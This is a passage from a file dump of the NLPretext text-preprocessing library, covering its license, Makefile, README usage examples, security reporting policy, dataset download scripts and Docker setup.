Run `STRICT=1 make check-safety` to ensure that security of your code is correct\n\n## Other help\n\nYou can contribute by spreading the word about this library.\nIt would also be a huge contribution to write\na short article on how you are using this project.\nYou can also share your best practices with us.\n\n# Docstring format\n\nWe chose to use **Numpydoc** over the several [standards](https://stackoverflow.com/questions/3898572/what-is-the-standard-python-docstring-format)\n\n```\n\"\"\"\nMy numpydoc description of a kind\nof very exhaustive numpydoc format docstring.\n\nParameters\n----------\nfirst : array_like\n    the 1st param name `first`\nsecond :\n    the 2nd param\nthird : {'value', 'other'}, optional\n    the 3rd param, by default 'value'\n\nReturns\n-------\nstring\n    a value in a string\n\nRaises\n------\nKeyError\n    when a key error\nOtherError\n    when an other error\n\"\"\"\n```\n"
  },
  {
    "path": "LICENSE",
    "content": "                                   Apache License\n                           Version 2.0, January 2004\n                        http://www.apache.org/licenses/\n\n   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION\n\n   1. Definitions.\n\n      \"License\" shall mean the terms and conditions for use, reproduction,\n      and distribution as defined by Sections 1 through 9 of this document.\n\n      \"Licensor\" shall mean the copyright owner or entity authorized by\n      the copyright owner that is granting the License.\n\n      \"Legal Entity\" shall mean the union of the acting entity and all\n      other entities that control, are controlled by, or are under common\n      control with that entity. For the purposes of this definition,\n      \"control\" means (i) the power, direct or indirect, to cause the\n      direction or management of such entity, whether by contract or\n      otherwise, or (ii) ownership of fifty percent (50%) or more of the\n      outstanding shares, or (iii) beneficial ownership of such entity.\n\n      \"You\" (or \"Your\") shall mean an individual or Legal Entity\n      exercising permissions granted by this License.\n\n      \"Source\" form shall mean the preferred form for making modifications,\n      including but not limited to software source code, documentation\n      source, and configuration files.\n\n      \"Object\" form shall mean any form resulting from mechanical\n      transformation or translation of a Source form, including but\n      not limited to compiled object code, generated documentation,\n      and conversions to other media types.\n\n      \"Work\" shall mean the work of authorship, whether in Source or\n      Object form, made available under the License, as indicated by a\n      copyright notice that is included in or attached to the work\n      (an example is provided in the Appendix below).\n\n      \"Derivative Works\" shall mean any work, whether in Source or Object\n      
form, that is based on (or derived from) the Work and for which the\n      editorial revisions, annotations, elaborations, or other modifications\n      represent, as a whole, an original work of authorship. For the purposes\n      of this License, Derivative Works shall not include works that remain\n      separable from, or merely link (or bind by name) to the interfaces of,\n      the Work and Derivative Works thereof.\n\n      \"Contribution\" shall mean any work of authorship, including\n      the original version of the Work and any modifications or additions\n      to that Work or Derivative Works thereof, that is intentionally\n      submitted to Licensor for inclusion in the Work by the copyright owner\n      or by an individual or Legal Entity authorized to submit on behalf of\n      the copyright owner. For the purposes of this definition, \"submitted\"\n      means any form of electronic, verbal, or written communication sent\n      to the Licensor or its representatives, including but not limited to\n      communication on electronic mailing lists, source code control systems,\n      and issue tracking systems that are managed by, or on behalf of, the\n      Licensor for the purpose of discussing and improving the Work, but\n      excluding communication that is conspicuously marked or otherwise\n      designated in writing by the copyright owner as \"Not a Contribution.\"\n\n      \"Contributor\" shall mean Licensor and any individual or Legal Entity\n      on behalf of whom a Contribution has been received by Licensor and\n      subsequently incorporated within the Work.\n\n   2. Grant of Copyright License. 
Subject to the terms and conditions of\n      this License, each Contributor hereby grants to You a perpetual,\n      worldwide, non-exclusive, no-charge, royalty-free, irrevocable\n      copyright license to reproduce, prepare Derivative Works of,\n      publicly display, publicly perform, sublicense, and distribute the\n      Work and such Derivative Works in Source or Object form.\n\n   3. Grant of Patent License. Subject to the terms and conditions of\n      this License, each Contributor hereby grants to You a perpetual,\n      worldwide, non-exclusive, no-charge, royalty-free, irrevocable\n      (except as stated in this section) patent license to make, have made,\n      use, offer to sell, sell, import, and otherwise transfer the Work,\n      where such license applies only to those patent claims licensable\n      by such Contributor that are necessarily infringed by their\n      Contribution(s) alone or by combination of their Contribution(s)\n      with the Work to which such Contribution(s) was submitted. If You\n      institute patent litigation against any entity (including a\n      cross-claim or counterclaim in a lawsuit) alleging that the Work\n      or a Contribution incorporated within the Work constitutes direct\n      or contributory patent infringement, then any patent licenses\n      granted to You under this License for that Work shall terminate\n      as of the date such litigation is filed.\n\n   4. Redistribution. 
You may reproduce and distribute copies of the\n      Work or Derivative Works thereof in any medium, with or without\n      modifications, and in Source or Object form, provided that You\n      meet the following conditions:\n\n      (a) You must give any other recipients of the Work or\n          Derivative Works a copy of this License; and\n\n      (b) You must cause any modified files to carry prominent notices\n          stating that You changed the files; and\n\n      (c) You must retain, in the Source form of any Derivative Works\n          that You distribute, all copyright, patent, trademark, and\n          attribution notices from the Source form of the Work,\n          excluding those notices that do not pertain to any part of\n          the Derivative Works; and\n\n      (d) If the Work includes a \"NOTICE\" text file as part of its\n          distribution, then any Derivative Works that You distribute must\n          include a readable copy of the attribution notices contained\n          within such NOTICE file, excluding those notices that do not\n          pertain to any part of the Derivative Works, in at least one\n          of the following places: within a NOTICE text file distributed\n          as part of the Derivative Works; within the Source form or\n          documentation, if provided along with the Derivative Works; or,\n          within a display generated by the Derivative Works, if and\n          wherever such third-party notices normally appear. The contents\n          of the NOTICE file are for informational purposes only and\n          do not modify the License. 
You may add Your own attribution\n          notices within Derivative Works that You distribute, alongside\n          or as an addendum to the NOTICE text from the Work, provided\n          that such additional attribution notices cannot be construed\n          as modifying the License.\n\n      You may add Your own copyright statement to Your modifications and\n      may provide additional or different license terms and conditions\n      for use, reproduction, or distribution of Your modifications, or\n      for any such Derivative Works as a whole, provided Your use,\n      reproduction, and distribution of the Work otherwise complies with\n      the conditions stated in this License.\n\n   5. Submission of Contributions. Unless You explicitly state otherwise,\n      any Contribution intentionally submitted for inclusion in the Work\n      by You to the Licensor shall be under the terms and conditions of\n      this License, without any additional terms or conditions.\n      Notwithstanding the above, nothing herein shall supersede or modify\n      the terms of any separate license agreement you may have executed\n      with Licensor regarding such Contributions.\n\n   6. Trademarks. This License does not grant permission to use the trade\n      names, trademarks, service marks, or product names of the Licensor,\n      except as required for reasonable and customary use in describing the\n      origin of the Work and reproducing the content of the NOTICE file.\n\n   7. Disclaimer of Warranty. Unless required by applicable law or\n      agreed to in writing, Licensor provides the Work (and each\n      Contributor provides its Contributions) on an \"AS IS\" BASIS,\n      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n      implied, including, without limitation, any warranties or conditions\n      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A\n      PARTICULAR PURPOSE. 
You are solely responsible for determining the\n      appropriateness of using or redistributing the Work and assume any\n      risks associated with Your exercise of permissions under this License.\n\n   8. Limitation of Liability. In no event and under no legal theory,\n      whether in tort (including negligence), contract, or otherwise,\n      unless required by applicable law (such as deliberate and grossly\n      negligent acts) or agreed to in writing, shall any Contributor be\n      liable to You for damages, including any direct, indirect, special,\n      incidental, or consequential damages of any character arising as a\n      result of this License or out of the use or inability to use the\n      Work (including but not limited to damages for loss of goodwill,\n      work stoppage, computer failure or malfunction, or any and all\n      other commercial damages or losses), even if such Contributor\n      has been advised of the possibility of such damages.\n\n   9. Accepting Warranty or Additional Liability. While redistributing\n      the Work or Derivative Works thereof, You may choose to offer,\n      and charge a fee for, acceptance of support, warranty, indemnity,\n      or other liability obligations and/or rights consistent with this\n      License. However, in accepting such obligations, You may act only\n      on Your own behalf and on Your sole responsibility, not on behalf\n      of any other Contributor, and only if You agree to indemnify,\n      defend, and hold each Contributor harmless for any liability\n      incurred by, or claims asserted against, such Contributor by reason\n      of your accepting any such warranty or additional liability.\n\n   END OF TERMS AND CONDITIONS\n\n   APPENDIX: How to apply the Apache License to your work.\n\n      To apply the Apache License to your work, attach the following\n      boilerplate notice, with the fields enclosed by brackets \"[]\"\n      replaced with your own identifying information. 
(Don't include\n      the brackets!)  The text should be enclosed in the appropriate\n      comment syntax for the file format. We also recommend that a\n      file or class name and description of purpose be included on the\n      same \"printed page\" as the copyright notice for easier\n      identification within third-party archives.\n\n   Copyright [yyyy] [name of copyright owner]\n\n   Licensed under the Apache License, Version 2.0 (the \"License\");\n   you may not use this file except in compliance with the License.\n   You may obtain a copy of the License at\n\n       http://www.apache.org/licenses/LICENSE-2.0\n\n   Unless required by applicable law or agreed to in writing, software\n   distributed under the License is distributed on an \"AS IS\" BASIS,\n   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n   See the License for the specific language governing permissions and\n   limitations under the License.\n"
  },
  {
    "path": "Makefile",
    "content": "SHELL := /usr/bin/env bash\n\nIMAGE := nlpretext\nVERSION := latest\n\nNO_CHECK_FLAG =  || true\n\nifeq ($(STRICT), 1)\n\tPOETRY_COMMAND_FLAG =\n\tPIP_COMMAND_FLAG =\n\tSAFETY_COMMAND_FLAG =\n\tBANDIT_COMMAND_FLAG =\n\tSECRETS_COMMAND_FLAG =\n\tBLACK_COMMAND_FLAG =\n\tDARGLINT_COMMAND_FLAG =\n\tISORT_COMMAND_FLAG =\n\tMYPY_COMMAND_FLAG =\nelse\n\tPOETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tPIP_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tSAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tBANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tSECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tBLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tDARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)\n\tMYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(POETRY_STRICT), 1)\n\tPOETRY_COMMAND_FLAG =\nelse ifeq ($(POETRY_STRICT), 0)\n\tPOETRY_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(PIP_STRICT), 1)\n\tPIP_COMMAND_FLAG =\nelse ifeq ($(PIP_STRICT), 0)\n\tPIP_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(SAFETY_STRICT), 1)\n\tSAFETY_COMMAND_FLAG =\nelse ifeq ($(SAFETY_STRICT), 0)\n\tSAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(BANDIT_STRICT), 1)\n\tBANDIT_COMMAND_FLAG =\nelse ifeq ($(BANDIT_STRICT), 0)\n\tBANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(SECRETS_STRICT), 1)\n\tSECRETS_COMMAND_FLAG =\nelse ifeq ($(SECRETS_STRICT), 0)\n\tSECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(BLACK_STRICT), 1)\n\tBLACK_COMMAND_FLAG =\nelse ifeq ($(BLACK_STRICT), 0)\n\tBLACK_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(DARGLINT_STRICT), 1)\n\tDARGLINT_COMMAND_FLAG =\nelse ifeq ($(DARGLINT_STRICT), 0)\n\tDARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(ISORT_STRICT), 1)\n\tISORT_COMMAND_FLAG =\nelse ifeq ($(ISORT_STRICT), 0)\n\tISORT_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\nifeq ($(MYPY_STRICT), 1)\n\tMYPY_COMMAND_FLAG =\nelse ifeq ($(MYPY_STRICT), 0)\n\tMYPY_COMMAND_FLAG = $(NO_CHECK_FLAG)\nendif\n\n.PHONY: 
download-poetry\ndownload-poetry:\n\tcurl -sSL https://install.python-poetry.org | python3 -\n\n.PHONY: install\ninstall:\n\tpoetry env use python3.10\n\tpoetry lock -n\n\tpoetry install -n\nifneq ($(NO_PRE_COMMIT), 1)\n\tpoetry run pre-commit install -t pre-commit -t pre-push\nendif\n\n.PHONY: check-safety\ncheck-safety:\n\tpoetry check$(POETRY_COMMAND_FLAG) && \\\n\tpoetry run pip check$(PIP_COMMAND_FLAG) && \\\n\tpoetry run safety check --full-report$(SAFETY_COMMAND_FLAG) && \\\n\tpoetry run bandit -r nlpretext/$(BANDIT_COMMAND_FLAG)\n\n.PHONY: gitleaks\ngitleaks:\n\tcommits=\"$$(git rev-list --ancestry-path $$(git rev-parse $$(git branch -r --sort=committerdate | tail -1))..$$(git rev-parse HEAD))\"; \\\n\tif [ \"$${commits}\" != \"\" ]; then docker run --rm -v $$(pwd):/code/ zricethezav/gitleaks --path=/code/ -v --commits=$$(echo $${commits} | paste -s -d, -)$(SECRETS_COMMAND_FLAG); fi;\n\n.PHONY: format-code\nformat-code:\n\tpoetry run pre-commit run --all\n\n.PHONY: test\ntest:\n\tpoetry run pytest\n\n.PHONY: lint\nlint: check-safety format-code test\n\n# Example: make docker VERSION=latest\n# Example: make docker IMAGE=some_name VERSION=1.0.4\n.PHONY: docker\ndocker:\n\t@echo Building docker $(IMAGE):$(VERSION) ...\n\tdocker build \\\n\t\t-t $(IMAGE):$(VERSION) . \\\n\t\t-f ./docker/Dockerfile\n\n# Example: make clean_docker VERSION=latest\n# Example: make clean_docker IMAGE=some_name VERSION=1.0.4\n.PHONY: clean_docker\nclean_docker:\n\t@echo Removing docker $(IMAGE):$(VERSION) ...\n\tdocker rmi -f $(IMAGE):$(VERSION)\n\n.PHONY: clean_build\nclean_build:\n\trm -rf build/\n\n.PHONY: clean\nclean: clean_build clean_docker\n"
  },
  {
    "path": "README.md",
    "content": "# NLPretext\n\n<p align=\"center\">\n    <img src=\"/references/logo_nlpretext.png\" />\n</p>\n\n<div align=\"center\">\n\n[![CI status](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml/badge.svg?branch%3Amain&event%3Apush)](https://github.com/artefactory/NLPretext/actions/workflows/ci.yml?query=branch%3Amain)\n[![CD status](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml/badge.svg?event%3Arelease)](https://github.com/artefactory/NLPretext/actions/workflows/cd.yml?query=event%3Arelease)\n[![Python Version](https://img.shields.io/badge/Python-3.8-informational.svg)](#supported-python-versions)\n[![Dependencies Status](https://img.shields.io/badge/dependabots-active-informational.svg)](https://github.com/artefactory/NLPretext}/pulls?utf8=%E2%9C%93&q=is%3Apr%20author%3Aapp%2Fdependabot)\n\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n[![Security: bandit](https://img.shields.io/badge/security-bandit-informational.svg)](https://github.com/PyCQA/bandit)\n[![Pre-commit](https://img.shields.io/badge/pre--commit-enabled-informational?logo=pre-commit&logoColor=white)](https://github.com/artefactory/NLPretext}/blob/main/.pre-commit-config.yaml)\n[![Semantic Versions](https://img.shields.io/badge/%F0%9F%9A%80-semantic%20versions-informational.svg)](https://github.com/artefactory/NLPretext/releases)\n[![Documentation](https://img.shields.io/badge/doc-sphinx-informational.svg)](https://github.com/artefactory/NLPretext}/tree/main/docs)\n[![License](https://img.shields.io/badge/License-Apache%20Software%20License%202.0-informational.svg)](https://github.com/artefactory/NLPretext}/blob/main/LICENSE)\n\nAll the goto functions you need to handle NLP use-cases, integrated in NLPretext\n\n</div>\n\n# TL;DR\n\n\n> *Working on an NLP project and tired of always looking for the same silly preprocessing functions on the web?*  :tired_face:\n\n> *Need to efficiently 
extract email addresses from a document? Hashtags from tweets? Remove accents from a French post?* :disappointed_relieved:\n\n\n**NLPretext got you covered!** :rocket:\n\nNLPretext packages in a **unique** library all the text **preprocessing** functions you need to **ease** your NLP project.\n\n\n:mag: Quickly explore below our preprocessing pipelines and individual functions referential.\n\n* [Default preprocessing pipeline](#default_pipeline)\n* [Custom preprocessing pipeline](#custom_pipeline)\n* [Replacing phone numbers](#replace_phone_numbers)\n* [Removing hashtags](#remove_hashtags)\n* [Extracting emojis](#extract_emojis)\n* [Data augmentation](#data_augmentation)\n\n\nCannot find what you were looking for? Feel free to open an [issue](https://github.com/artefactory/nlpretext/issues).\n\n\n\n# Installation\n\n### Supported Python Versions\n\n- Main version supported: `3.8`\n- Other supported versions: `3.9`, `3.10`\n\n\nWe strongly advise you to do the remaining steps in a virtual environment.\n\nTo install this library from PyPI, run the following command:\n\n```bash\npip install nlpretext\n```\n\nor with `Poetry`\n\n```bash\npoetry add nlpretext\n```\n\n\n# Usage\n\n## Default pipeline <a name=\"default_pipeline\"></a>\n\nNeed to preprocess your text data but no clue about what function to use and in which order? The default preprocessing pipeline got you covered:\n\n```python\nfrom nlpretext import Preprocessor\ntext = \"I just got the best dinner in my life @latourdargent !!! I  recommend 😀 #food #paris \\n\"\npreprocessor = Preprocessor()\ntext = preprocessor.run(text)\nprint(text)\n# \"I just got the best dinner in my life!!! 
I recommend\"\n```\n\n## Create your custom pipeline <a name=\"custom_pipeline\"></a>\n\nAnother possibility is to create your custom pipeline if you know exactly what function to apply on your data, here's an example:\n\n```python\nfrom nlpretext import Preprocessor\nfrom nlpretext.basic.preprocess import (normalize_whitespace, remove_punct, remove_eol_characters,\nremove_stopwords, lower_text)\nfrom nlpretext.social.preprocess import remove_mentions, remove_hashtag, remove_emoji\ntext = \"I just got the best dinner in my life @latourdargent !!! I  recommend 😀 #food #paris \\n\"\npreprocessor = Preprocessor()\npreprocessor.pipe(lower_text)\npreprocessor.pipe(remove_mentions)\npreprocessor.pipe(remove_hashtag)\npreprocessor.pipe(remove_emoji)\npreprocessor.pipe(remove_eol_characters)\npreprocessor.pipe(remove_stopwords, args={'lang': 'en'})\npreprocessor.pipe(remove_punct)\npreprocessor.pipe(normalize_whitespace)\ntext = preprocessor.run(text)\nprint(text)\n# \"dinner life recommend\"\n```\n\nTake a look at all the functions that are available [here](https://github.com/artefactory/NLPretext/tree/master/nlpretext) in the ```preprocess.py``` scripts in the different folders: basic, social, token.\n\n\n## Load text data\n\nPre-processing text data is useful only if you have loaded data to process! Importing text data as strings in your code can be really simple if you have short texts contained in a local .txt, but it can quickly become difficult if you want to load a lot of texts, stored in multiple formats and divided in multiple files. 
Fortunately, you can use NLPretext's TextLoader class to easily import text data.\nWhile it is not mandatory, our TextLoader works best with Dask; make sure to have the library installed if you want the best performance.\n\n```python\nfrom nlpretext.textloader import TextLoader\nfiles_path = \"local_folder/texts/text.txt\"\ntext_loader = TextLoader(use_dask=True)\ntext_dataframe = text_loader.read_text(files_path)\nprint(text_dataframe.text.values.tolist())\n# [\"I just got the best dinner in my life!!!\",  \"I recommend\", \"It was awesome\"]\n```\n\nFile path can be provided as string, list of strings, with or without wildcards. It also supports imports from cloud providers, if your machine is authenticated on a project.\n\n```python\ntext_loader = TextLoader(text_column=\"name_of_text_column_in_your_data\")\n\nlocal_file_path = \"local_folder/texts/text.csv\" # File from local folder\nlocal_corpus_path = [\"local_folder/texts/text_1.csv\", \"local_folder/texts/text_2.csv\", \"local_folder/texts/text_3.csv\"] # Multiple files from local folder\n\ngcs_file_path = \"gs://my-bucket/texts/text.json\" # File from GCS\ns3_file_path = \"s3://my-bucket/texts/text.json\" # File from S3\nhdfs_file_path = \"hdfs://folder/texts/text.txt\" # File from HDFS\nazure_file_path = \"az://my-bucket/texts/text.parquet\" # File from Azure\n\ngcs_corpus_path = \"gs://my-bucket/texts/text_*.json\" # Multiple files from GCS with wildcard\n\ntext_dataframe_1 = text_loader.read_text(local_file_path)\ntext_dataframe_2 = text_loader.read_text(local_corpus_path)\ntext_dataframe_3 = text_loader.read_text(gcs_file_path)\ntext_dataframe_4 = text_loader.read_text(s3_file_path)\ntext_dataframe_5 = text_loader.read_text(hdfs_file_path)\ntext_dataframe_6 = text_loader.read_text(azure_file_path)\ntext_dataframe_7 = text_loader.read_text(gcs_corpus_path)\n\n```\n\nYou can also specify a Preprocessor if you want your data to be directly pre-processed when loaded.\n```python\ntext_loader = 
TextLoader(text_column=\"text_col\")\npreprocessor = Preprocessor()\n\nlocal_file_path = \"local_folder/texts/text.csv\" # File from local folder\n\nraw_text_dataframe = text_loader.read_text(local_file_path)\npreprocessed_text_dataframe = text_loader.read_text(local_file_path, preprocessor=preprocessor)\n\nprint(raw_text_dataframe.text_col.values.tolist())\n# [\"These   texts are not preprocessed\",  \"This is bad ## \"]\n\nprint(preprocessed_text_dataframe.text_col.values.tolist())\n# [\"These texts are not preprocessed\",  \"This is bad\"]\n```\n\n\n## Individual Functions\n\n### Replacing emails <a name=\"replace_emails\"></a>\n\n```python\nfrom nlpretext.basic.preprocess import replace_emails\nexample = \"I have forwarded this email to obama@whitehouse.gov\"\nexample = replace_emails(example, replace_with=\"*EMAIL*\")\nprint(example)\n# \"I have forwarded this email to *EMAIL*\"\n```\n\n### Replacing phone numbers <a name=\"replace_phone_numbers\"></a>\n\n```python\nfrom nlpretext.basic.preprocess import replace_phone_numbers\nexample = \"My phone number is 0606060606\"\nexample = replace_phone_numbers(example, country_to_detect=[\"FR\"], replace_with=\"*PHONE*\")\nprint(example)\n# \"My phone number is *PHONE*\"\n```\n\n### Removing Hashtags <a name=\"remove_hashtags\"></a>\n\n```python\nfrom nlpretext.social.preprocess import remove_hashtag\nexample = \"This restaurant was amazing #food #foodie #foodstagram #dinner\"\nexample = remove_hashtag(example)\nprint(example)\n# \"This restaurant was amazing\"\n```\n\n### Extracting emojis <a name=\"extract_emojis\"></a>\n\n```python\nfrom nlpretext.social.preprocess import extract_emojis\nexample = \"I take care of my skin 😀\"\nexample = extract_emojis(example)\nprint(example)\n# [':grinning_face:']\n```\n\n## Data augmentation <a name=\"data_augmentation\"></a>\n\nThe augmentation module helps you to **generate new texts** based on your given examples by modifying some words in the initial ones and to **keep associated 
entities unchanged**, if any, in the case of **NER tasks**. If you want words other than entities to remain unchanged, you can specify it within the `stopwords` argument. Modifications depend on the chosen method, the ones currently supported by the module are **substitutions with synonyms** using Wordnet or BERT from the [`nlpaug`](https://github.com/makcedward/nlpaug) library.\n\n```python\nfrom nlpretext.augmentation.text_augmentation import augment_text\nexample = \"I want to buy a small black handbag please.\"\nentities = [{'entity': 'Color', 'word': 'black', 'startCharIndex': 22, 'endCharIndex': 27}]\nexample = augment_text(example, method=\"wordnet_synonym\", entities=entities)\nprint(example)\n# \"I need to buy a small black pocketbook please.\"\n```\n\n\n\n\n# 📈 Releases\n\nYou can see the list of available releases on the [GitHub Releases](https://github.com/artefactory/NLPretext/releases) page.\n\nWe follow [Semantic Versions](https://semver.org/) specification.\n\nWe use [`Release Drafter`](https://github.com/marketplace/actions/release-drafter). As pull requests are merged, a draft release is kept up-to-date listing the changes, ready to publish when you’re ready. With the categories option, you can categorize pull requests in release notes using labels.\n\nFor Pull Requests, these labels are configured, by default:\n\n|               **Label**               |  **Title in Releases**  |\n| :-----------------------------------: | :---------------------: |\n|       `enhancement`, `feature`        |       🚀 Features       |\n| `bug`, `refactoring`, `bugfix`, `fix` | 🔧 Fixes & Refactoring  |\n|       `build`, `ci`, `testing`        | 📦 Build System & CI/CD |\n|              `breaking`               |   💥 Breaking Changes   |\n|            `documentation`            |    📝 Documentation     |\n|            `dependencies`             | ⬆️ Dependencies updates |\n\n\nGitHub creates the `bug`, `enhancement`, and `documentation` labels automatically. 
Dependabot creates the `dependencies` label. Create the remaining labels on the Issues tab of the GitHub repository, when needed.\n\n## 🛡 License\n\n[![License](https://img.shields.io/github/license/artefactory/NLPretext)](https://github.com/artefactory/NLPretext/blob/main/LICENSE)\n\nThis project is licensed under the terms of the `Apache Software License 2.0` license. See [LICENSE](https://github.com/artefactory/NLPretext/blob/main/LICENSE) for more details.\n\n## 📃 Citation\n\n```\n@misc{nlpretext,\n  author = {artefactory},\n  title = {All the goto functions you need to handle NLP use-cases, integrated in NLPretext},\n  year = {2021},\n  publisher = {GitHub},\n  journal = {GitHub repository},\n  howpublished = {\\url{https://github.com/artefactory/NLPretext}}\n}\n```\n\n\n# Project Organization\n------------\n\n    .\n    ├── .github/workflows           <- Where the CI and CD lives\n    ├── datasets/external           <- Bash scripts to download external datasets\n    ├── docker                      <- All you need to build a Docker image from that package\n    ├── docs                        <- Sphinx HTML documentation\n    ├── nlpretext                   <- Main Package. 
This is where the code lives\n    │   ├── preprocessor.py         <- Main preprocessing script\n    │   ├── text_loader.py          <- Main loading script\n    │   ├── augmentation            <- Text augmentation script\n    │   ├── basic                   <- Basic text preprocessing\n    │   ├── cli                     <- Command lines that can be used\n    │   ├── social                  <- Social text preprocessing\n    │   ├── token                   <- Token text preprocessing\n    │   ├── textloader              <- File loading\n    │   ├── _config                 <- Where the configuration and constants live\n    │   └── _utils                  <- Where preprocessing utils scripts lives\n    ├── references                  <- assets\n    ├── tests                       <- Where the tests lives\n    ├── .gitignore\n    ├── .pre-commit-config.yaml     <- Pre-commit configuration\n    ├── CODE_OF_CONDUCT.md          <- Code of conduct guidelines\n    ├── CONTRIBUTING.md             <- Contribution guidelines\n    ├── LICENSE\n    ├── Makefile\n    ├── pyproject.toml              <- Package build configuration\n    ├── README.md                   <- The top-level README for developers using this project.\n    └── SECURITY.md\n\n# Credits\n\n- [textacy](https://github.com/chartbeat-labs/textacy) for the following basic preprocessing functions:\n    - `fix_bad_unicode`\n    - `normalize_whitespace`\n    - `unpack_english_contractions`\n    - `replace_urls`\n    - `replace_emails`\n    - `replace_numbers`\n    - `replace_currency_symbols`\n    - `remove_punct`\n    - `remove_accents`\n    - `replace_phone_numbers` *(with some modifications of our own)*\n"
  },
  {
    "path": "SECURITY.md",
    "content": "# Security\n\n## 🔐 Reporting Security Issues\n\n> Do not open issues that might have security implications!\n> It is critical that security related issues are reported privately so we have time to address them before they become public knowledge.\n\nVulnerabilities can be reported by emailing core members:\n\n- artefactory [jules.bertrand@artefact.com](mailto:jules.bertrand@artefact.com)\n\nPlease include the requested information listed below (as much as you can provide) to help us better understand the nature and scope of the possible issue:\n\n- Type of issue (e.g. buffer overflow, SQL injection, cross-site scripting, etc.)\n- Full paths of source file(s) related to the manifestation of the issue\n- The location of the affected source code (tag/branch/commit or direct URL)\n- Any special configuration required to reproduce the issue\n- Environment (e.g. Linux / Windows / macOS)\n- Step-by-step instructions to reproduce the issue\n- Proof-of-concept or exploit code (if possible)\n- Impact of the issue, including how an attacker might exploit the issue\n\nThis information will help us triage your report more quickly.\n\n## Preferred Languages\n\nWe prefer all communications to be in English.\n"
  },
  {
    "path": "datasets/external/get_language_dataset.sh",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n#!/bin/bash\nwget -O wili.zip https://zenodo.org/record/841984/files/wili-2018.zip?download=1\nmkdir -p wili && cp wili.zip wili && cd wili && unzip wili.zip && cd ..\n"
  },
  {
    "path": "datasets/external/get_stanfordtweets.sh",
    "content": "# GNU Lesser General Public License v3.0 only\n# Copyright (C) 2020 Artefact\n# licence-information@artefact.com\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 3 of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.\n#!/bin/bash\nwget -O trainingandtestdata.zip http://cs.stanford.edu/people/alecmgo/trainingandtestdata.zip\nmkdir -p  tweets_sentiment && cp trainingandtestdata.zip tweets_sentiment && cd tweets_sentiment && unzip trainingandtestdata.zip\n"
  },
  {
    "path": "docker/Dockerfile",
    "content": "FROM python:3.10-slim-buster\n\nENV LANG=C.UTF-8 \\\n  LC_ALL=C.UTF-8\n\nRUN apt-get update && \\\n  apt-get install -y --no-install-recommends \\\n  curl coreutils \\\n  && rm -rf /var/lib/apt/lists/*\n\n  # Install Poetry\nENV POETRY_VERSION=1.5.1\nRUN pip install --upgrade pip\nRUN python3 -m pip install \"poetry==$POETRY_VERSION\"\n\nWORKDIR /home/workspace\n\nCOPY pyproject.toml ./\n\nRUN poetry config virtualenvs.create false \\\n  && poetry lock \\\n  && poetry install --no-root --no-dev --no-interaction\n\nCOPY . /home/docker_user/workspace/\n\nENTRYPOINT [\"poetry\", \"run\", \"nlpretext\"]\n"
  },
  {
    "path": "docker/README.md",
    "content": "# Docker for nlpretext\n\n## Installation\n\nTo create Docker you need to run:\n\n```bash\nmake docker\n```\n\nwhich is equivalent to:\n\n```bash\nmake docker VERSION=latest\n```\n\nYou could also provide name and version for the image itself.\nDefault name is `IMAGE := nlpretext`.\nDefault version is `VERSION := latest`.\n\n```bash\nmake docker IMAGE=some_name VERSION=1.0.4\n```\n\n## Usage\n\n```bash\ndocker run -it --rm \\\n   -v $(pwd):/workspace \\\n   nlpretext bash\n```\n\n## How to clean up\n\nTo uninstall docker image run `make clean_docker` with `VERSION`:\n\n```bash\nmake clean_docker VERSION=1.0.4\n```\n\nlike in installation, you can also choose the image name\n\n```bash\nmake clean_docker IMAGE=some_name VERSION=latest\n```\n\nIf you want to clean all, including `build` run `make clean`\n"
  },
  {
    "path": "docs/Makefile",
